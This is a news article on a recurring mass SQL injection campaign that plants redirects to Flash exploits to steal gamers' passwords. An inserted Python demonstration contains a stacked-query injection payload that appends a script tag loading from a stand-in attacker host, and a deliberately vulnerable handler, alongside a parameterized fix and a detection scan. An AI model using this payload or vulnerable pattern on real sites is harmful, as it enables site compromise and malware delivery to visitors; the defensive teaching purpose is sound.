Mass SQL injection attack, take four: Yet another wave of SQL injection attacks is exploiting an Adobe Flash vulnerability, and it appears to come from the same series of attacks originating in China. (See Silent But Deadly Web Defacement, Third Wave of Web Attacks Not the Last, and Bots Use SQL Injection Tool in New Web Attack.)
The intent, as in previous attacks, has been to steal online gamers' password credentials. But given the persistence and scope of the attacks over the past few months, researchers worry that World of Warcraft players and other gaming jocks aren't the only users at risk in these stubborn Website attacks.
"Even if a user isn't online-gaming, he or she could become a victim of the attack," says Ben Greenbaum, senior research manager at Symantec Security Response. "The hostile portion of this content lives on attacker-controlled servers... and they could change their payload at any time, injecting keyloggers or other more malicious programs to steal personal information, for instance."
Ivan Macalintal, senior research engineer for Trend Micro, agrees. "The payload... could be dynamically changed at any time [by] the remote attacker. If they want to change it to other password stealers, it would be potentially damaging to other users besides online gamers."
The latest attack works like this: A vulnerable Website is first compromised with a SQL injection attack, and the malicious script that's injected into the site's content points a visitor's browser to a malicious URL that serves Shockwave Flash (SWF) files exploiting the Adobe Flash bug (aka CVE-2007-0071), according to Trend Micro. Then, unbeknownst to the user, his or her vulnerable machine downloads the malicious file, which researchers say is either spyware to steal credentials or some type of Trojan dropper that downloads other malicious files.
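The injection stage described above, as an added example that is not from the article or any of the researchers it quotes: a dynamic-SQL page-view counter lets a stacked UPDATE append a remote script tag to every stored page, while the parameterized version rejects the same input, and a scan of the stored content finds rows that now load scripts from a host outside the site's own. The table, rows, and the host malicious.example are constructed for this example; sqlite3's executescript() stands in for a database driver that runs several statements per request, as the MSSQL sites hit in these waves did.

```python
import re
import sqlite3

# Constructed sample content standing in for a site's text columns, the
# target of the mass-injection waves. Not data from the article.
SAMPLE_ROWS = [
    (1, "Welcome to the guild forum", 0),
    (2, "Patch notes for this week", 0),
]

# Hypothetical attacker host for this example; the campaign's real
# domains are not reproduced here.
INJECTED_TAG = '<script src="http://malicious.example/js.js"></script>'

# Stacked-query payload: terminate the intended statement, then append the
# script tag to every row's body (the pattern of the 2008 waves, which
# looped over all text columns).
INJECTED_ID = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "'"


def make_db():
    """Fresh in-memory database holding the constructed sample pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT, views INTEGER)"
    )
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def record_view_vulnerable(conn, page_id):
    """Dynamic SQL: the request parameter is pasted into the statement.
    executescript() simulates a driver/DBMS that executes a batch of
    statements per call; sqlite's plain execute() would refuse the second
    statement, which is why it is not used here."""
    sql = "UPDATE pages SET views = views + 1 WHERE id = " + page_id
    conn.executescript(sql)


def record_view_safe(conn, page_id):
    """Validate the type, then bind the value: the text can never become SQL.
    Returns the number of rows updated."""
    page_id = int(page_id)  # '1; UPDATE ...' raises ValueError here
    cur = conn.execute(
        "UPDATE pages SET views = views + 1 WHERE id = ?", (page_id,)
    )
    conn.commit()
    return cur.rowcount


# Matches <script ... src="http(s)://host/..."> and captures (url, host).
SCRIPT_SRC = re.compile(
    r'<script[^>]*\ssrc=["\']?\s*(https?://([^/"\'\s>]+)[^"\'\s>]*)', re.I
)


def find_foreign_scripts(conn, allowed_hosts):
    """Scan stored content for <script src=...> tags loading from hosts
    outside the site's allowlist, the signature the injected rows carry.
    Returns a list of (page_id, host) pairs."""
    hits = []
    for page_id, body in conn.execute("SELECT id, body FROM pages ORDER BY id"):
        for _url, host in SCRIPT_SRC.findall(body or ""):
            if host.lower() not in allowed_hosts:
                hits.append((page_id, host))
    return hits


def demo():
    """Run the same injected parameter through both handlers and return the
    scan results for each database: (poisoned_hits, safe_hits)."""
    own_hosts = {"www.example-game-site.test"}  # the site's own host, assumed

    poisoned = make_db()
    record_view_vulnerable(poisoned, INJECTED_ID)
    poisoned_hits = find_foreign_scripts(poisoned, own_hosts)

    clean = make_db()
    try:
        record_view_safe(clean, INJECTED_ID)
    except ValueError:
        pass  # rejected before any SQL runs
    clean_hits = find_foreign_scripts(clean, own_hosts)
    return poisoned_hits, clean_hits


if __name__ == "__main__":
    print(demo())
```

A scan like find_foreign_scripts is the quickest way for a site owner to confirm whether a previous wave already reached their database, since the injected tag is appended to existing content rather than replacing it and the page otherwise renders normally.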
Symantec originally reported that the attack was using a zero-day Adobe Flash exploit, but later found that it was the existing and recently patched buffer-overflow bug in the Flash Player, which is triggered when Flash Player processes a malicious SWF file. Still, some of the latest versions of the Adobe Flash Player appear to be susceptible to the attack even with the patch, notes Symantec's Greenbaum, including the newest version of the Linux stand-alone player and the Debugger version of the player. (See The Zero Day That Isn't.)
The attack appears to be using and reusing the same domains as in previous waves of SQL injection attacks. "And the same exploit code in the threat chain," Trend's Macalintal says. "They are using the same or similar types of data from a family of online [credential]-stealing Trojans."
ShadowServer, meanwhile, has posted a list of some of the compromised Websites that are serving exploits for the Adobe Flash Player flaw.
One feature of the attack is that the infected Website appears to check the victim's browser type as well as his or her Flash Player version in order to drop the exploit matching that combination.
What do the nefarious SWF files look like? Panda Labs researchers say that in some cases, they're in the form of an animation a user has to run, or an image on the Web page. "The maliciously-crafted Flash file could come in the form of a novelty animation which users have to run or it could be an image which is loaded directly on opening the Web page. This way, users would not suspect the infection, as the Web page could appear to be completely legitimate," says Luis Corrons, technical director of PandaLabs, in a written assessment of the threat. "The fact that the vulnerability can be exploited regardless of the browser used allows cyber-crooks to infect a greater number of users."
And look for more versions of this monster SQL injection attack, which takes advantage of the prolific flaw in many Websites. "They're not going to stop at stealing passwords and selling them to the cyber underground for gamers," Trend's Macalintal says.